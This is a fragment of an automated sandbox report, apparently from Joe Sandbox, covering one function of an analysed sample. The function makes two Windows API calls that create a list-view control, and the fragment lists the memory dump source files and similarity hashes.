                                    Function 0040E7B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • InitCommonControlsEx.COMCTL32 ref: 0040E7BF
                                    • CreateWindowExW.USER32(00000000,SysListView32,00419450,50010201,0000000A,00000028,00000190,000001F4,?,00000000,00000000,00000000), ref: 0040E7F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CommonControlsCreateInitWindow
                                    • String ID: SysListView32
                                    • API String ID: 2646078016-78025650
                                    • Opcode ID: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction ID: f3d3e535e189fff61838196dd880c7fe0caa92239aab9ee536b101cdf5704626
                                    • Opcode Fuzzy Hash: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction Fuzzy Hash: 99E04F747843007FF6509B40DC5BF963764A788F05F50C024F649A51C0D6F46885866A